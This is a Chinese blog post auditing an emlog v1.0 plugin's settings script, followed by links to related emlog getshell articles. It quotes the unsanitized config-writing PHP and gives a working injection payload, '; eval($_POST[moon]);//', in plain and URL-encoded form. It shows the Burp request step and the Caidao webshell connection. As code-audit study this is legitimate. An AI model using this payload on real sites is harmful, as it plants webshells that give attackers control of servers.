代码审计emlog后台getshell

最新推荐文章于 2024-06-28 17:06:17 发布
最新推荐文章于 2024-06-28 17:06:17 发布
阅读量286 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42307546/article/details/124993485
版权

用的是较为古老的版本v1.0,这里只是作为一个代码审计的练习
项目地址

https://www.jb51.net/codes/105832.html

这里的漏洞点在
\content\plugins\ttjtg_banquan\ttjtg_banquan_setting.php,48-73行

<?php 
}
function plugin_setting()
{
$fz_kaiguan = isset($_POST['fz_kaiguan']) ? trim($_POST['fz_kaiguan']) : '';
$bk_yanse = isset($_POST['bk_yanse']) ? trim($_POST['bk_yanse']) : '';
$zt_yanse = isset($_POST['zt_yanse']) ? trim($_POST['zt_yanse']) : '';
$mingcheng = isset($_POST['mingcheng']) ? trim($_POST['mingcheng']) : '';
	
	print_r($_POST);
	 
$data = "<?php
\$fz_kaiguan = '".$fz_kaiguan."';
\$bk_yanse = '".$bk_yanse."';
\$zt_yanse = '".$zt_yanse."';
\$mingcheng = '".$mingcheng."';
?>";
	if($bk_yanse != '' && $fz_kaiguan != ''&& $zt_yanse != ''&& $mingcheng != '')
	{
		$file = EMLOG_ROOT.'/content/plugins/ttjtg_banquan/ttjtg_banquan_config.php';
		@ $fp = fopen($file, 'wb') OR emMsg('读取文件失败,如果您使用的是Unix/Linux主机,请修改文件/content/plugins/ttjtg_banquan/ttjtg_banquan_config.php的权限为777。如果您使用的是Windows主机,请联系管理员,将该文件设为everyone可写');
		@ $fw =	fwrite($fp,$data) OR emMsg('写入文件失败,如果您使用的是Unix/Linux主机,请修改文件/content/plugins/ttjtg_banquan/ttjtg_banquan_config.php的权限为777。如果您使用的是Windows主机,请联系管理员,将该文件设为everyone可写');
		fclose($fp);
	}
}
?>
}
?>

这里并没有对要写入的数组进行处理就直接写入了\content\plugins\ttjtg_banquan\ttjtg_banquan_config.php,我们只要闭合前面的单引号在写入一句话,这里最好是mingcheng在注释掉后面的语句

通过全局搜索可以看到admin/plugin.php调用了这个函数,41-46行

if ($action == '' && $plugin) {
	include View::getView('header');
	require_once "../content/plugins/{$plugin}/{$plugin}_setting.php";
	plugin_setting_view();
	include View::getView('footer');
}

通过变量plugin传参,plugin是通过get传参,直接访问
http://127.0.0.1/admin/plugin?plugin=ttjtg_banquan,直接点保存用bp抓包
在这里插入图片描述
将’; eval($_POST[moon]);//进行url编码拼接到变量mingcheng后发送
%27%3b%65%76%61%6c%28%24%5f%50%4f%53%54%5b%6d%6f%6f%6e%5d%29%3b%2f%2f
在这里插入图片描述

成功写入
在这里插入图片描述

菜刀连接
http://www.mm.com:8080/content/plugins/ttjtg_banquan/ttjtg_banquan_config.php
在这里插入图片描述

qq_42307546
关注
代码审计之youdiancms最新版getshell漏洞1
08-03
代码审计之youdiancms最新版getshell漏洞 本文将对youdiancms最新版getshell漏洞进行代码审计,详细讲解漏洞的发现和利用过程。 SQL注入漏洞 第一步,我们拿到源码,发现该系统是基于THINKPHP3开发的。在App/Lib/...
Emlog 6.0 Beta的完整代码审计过程
weixin_33748818的博客
08-13 431
Emlog 6.0 beta版本,这可能是最后一篇关于PHP语言CMS的代码审计文章,此次将详细记录完整的审计过程。 文章基本上完整记录小东的对此CMS审计过程,或许显得繁琐,但代码审计的过程就是这样,发现可能项,然后精心构造去验证,这过程中我们会遇到很多次碰壁,坚持测试,思维活跃一些,基本都会有所收获,诚挚希望后来者能够耐心阅读下去,当然最好也能够有所启发。 大家需要注意的一点是,代码审计是...
Emlog漏洞————Emlog数据库备份与导入功能导致后台getshell
Fly_鹏程万里
06-05 2341
Emlog简介   Emlog是“Every Memory Log”的简介,意即:点滴记忆。它是一款基于PHP语言哈MYSQL数据库的开源、免费、功能强大的个人或多人联合撰写的博客系统(Blog)。基于PHP和MYSQL的功能强大的博客以及CMS建站系统。致力于提供快速、稳定,且在使用上又及其简单、舒适的博客服务。安装和使用都非常方便。目前Emlog正在受到越来越多的广大用户的青睐。 漏洞分...
关于emlog6.0代码审计
最新发布
zkaqlaoniao的博客
06-28 539
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。帮助你在面试中脱颖而出。
emblog后台shell
aiquan9342的博客
04-09 138
emlog版本:5.3.1 先本地弄好shell 新建一个文件夹,里面放shellshell名称和文件名要一致。压缩为zip 然后在安装插件处上传。 成功后的路径content/plugins/test/test.php这个是主题包的路径 over. 转载于:https://www.cnblogs.com/xishaonian/p/6683685.html...
Emlog漏洞————Emlog相册插件前台SQL注入+Getshell
Fly_鹏程万里
06-05 2651
Emlog简介 Emlog是“Every Memory Log”的简介,意即:点滴记忆。它是一款基于PHP语言哈MYSQL数据库的开源、免费、功能强大的个人或多人联合撰写的博客系统(Blog)。基于PHP和MYSQL的功能强大的博客以及CMS建站系统。致力于提供快速、稳定,且在使用上又及其简单、舒适的博客服务。安装和使用都非常方便。目前Emlog正在受到越来越多的广大用户的青睐。 此次引起漏洞...
Emlog6.6.0-PHP代码审计学习
weixin_53884648的博客
10-20 296
描述:在做一个产品安全测试时,最想的就是尽可能的找出所有的问题,不让产品带着问题发布,尽管目前在国家的倡导下站点都要进行相关的安全产品的部署,但产品本身存在问题,就会给攻击者攻击降低了门槛,除了开发产品种代码引起的安全问题,我们还要关注各种组件安全问题,在公布相关问题后及时更新官方版本。最后代码审计还是需要耐心的去看参数的引用情况,这方面还要共勉进行学习。整体文章应该还要加入一个漏扫工具使用和漏洞验证的。这里就不进行漏扫了。
emlog CMS的代码审计_越权到后台getshell - 先知社区1
08-03
前言代码审计安装漏洞漏洞文件: install.php首先我们直奔第一个点能否任意重装,我们可以看到必须常量 DEL_INSTALLER 为 1 的时候才会触发
Emlog后台登录模板分享下载
11-05
使用方法 把源码放进你们的admin目录里面的views文件夹 记住 是要把login.php文件和css文件覆盖进去
汉松收集网emlog后台管理面板主题源码
06-16
lscale主题是一套emlog后台界面主题,基于目前非常流行的响应式框架bootstrap开发,使用专为bootstrap设计创造的Font Awesome字体图标,响应式设计主流的左右两栏布局,完美支持电脑、平板、手机等主流终端设备,与...
emlog后台管理面板lscale主题
07-12
lscale主题是一套emlog后台界面主题,基于目前非常流行的响应式框架bootstrap开发 使用专为bootstrap设计创造的Font Awesome字体图标,响应式设计主流的左右两栏布局 完美支持电脑、平板、手机等主流终端设备,与...
emlog 代码审计
y0un9er
04-03 481
emlog 代码审计练习
网红漏洞“致远OA系统上的GetShell漏洞”详解
热门推荐
systemino的博客
07-08 1万+
概述 腾讯御界高级威胁检测系统近期监测到“致远OA系统上的 GetShell漏洞”在网上被频繁利用攻击政企客户。 对于存在漏洞的OA系统,攻击者无需任何权限,即可向服务器上传webshell。 腾讯驻场工程师通过御界高级威胁检测系统告警通知及时向客户通报并采取必要措施,客户业务系统未受攻击影响。 详细分析 该漏洞最早于6月26号左右,有安全厂商发出漏洞预警。 远程攻击者在无需登录的...
前台拿shell_emlog后台shell
weixin_39631295的博客
11-22 198
遇到某个站需要打包源码下来审计,然而过程却是非常的坑爹目标站7.xx.com然后服务器上一堆演示站,目测是个卖源码的:1.xx.com2.xx.com3.xx.com4.xx.com5.xx.com6.xx.com7.xx.com8.xx.com9.xx.com10.xx.com11.xx.com12.xx.com13.xx.com...前面12个站均是弱口令进后台,都存在被后台拿she...
后台getshell常用技巧
黑面狐
04-03 1万+
1.利用文件上传漏洞,找文件上传处想办法上传php文件。 一些网站在设置可以允许修改上传的文件类型则直接添加php 有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过 很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况 这种情况直接上传一个.hatccess文件覆盖这个,让其失效。 或者上传不重命名的...
EMLOG漏洞 | 敏感信息泄漏phpinfo-代码审计
DYBOY-程序开发&网络安全
12-24 5294
Emlog是一款个人博客系统,使用的人还是非常多的,小巧方便,对于个人站长来说是一个建站的不错选择。今天要公布一个危害轻微的漏洞:phpinfo暴露敏感信息   其实这个漏洞也不算什么吧,以后视情况(得到官方授权后)公布一些高危的漏洞,也欢迎大家持续关注DYBOY的博客。   闲话不多说,首先看看漏洞出现的位置: phpinfo暴露敏感信息 如上图,我们只要构造
Emlog漏洞————敏感信息泄露
Fly_鹏程万里
06-05 2820
Emlog简介 Emlog是“Every Memory Log”的简介,意即:点滴记忆。它是一款基于PHP语言哈MYSQL数据库的开源、免费、功能强大的个人或多人联合撰写的博客系统(Blog)。基于PHP和MYSQL的功能强大的博客以及CMS建站系统。致力于提供快速、稳定,且在使用上又及其简单、舒适的博客服务。安装和使用都非常方便。目前Emlog正在受到越来越多的广大用户的青睐。 漏洞分析 ...
Emlog漏洞 | EMLOG博客系统存在暴力破解漏洞
DYBOY-程序开发&网络安全
11-03 7165
漏洞简介: Emlog博客系统默认后台登陆地址为http://域名/admin/login.php后台登陆时,错误情况下,验证码未刷新,导致可暴力破解登陆管理员账号 低危漏洞,但是在emlog5.3.1和6.0测试版本均存在   漏洞成因:   同时,其6.0测试版本也未修复。   漏洞验证/演示: 下载官方的emlog5.3.1版本 http://www.emlog.n
"emlog CMS代码审计:越权到后台getshell - 先知社区
文章主要介绍了emlog CMS的代码审计过程中发现的一个越权访问后台并获取shell的漏洞。作者首先通过分析安装文件install.php发现了一系列漏洞,包括无验证功能、任意重装覆盖、表单不做过滤等问题,导致了config.php...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值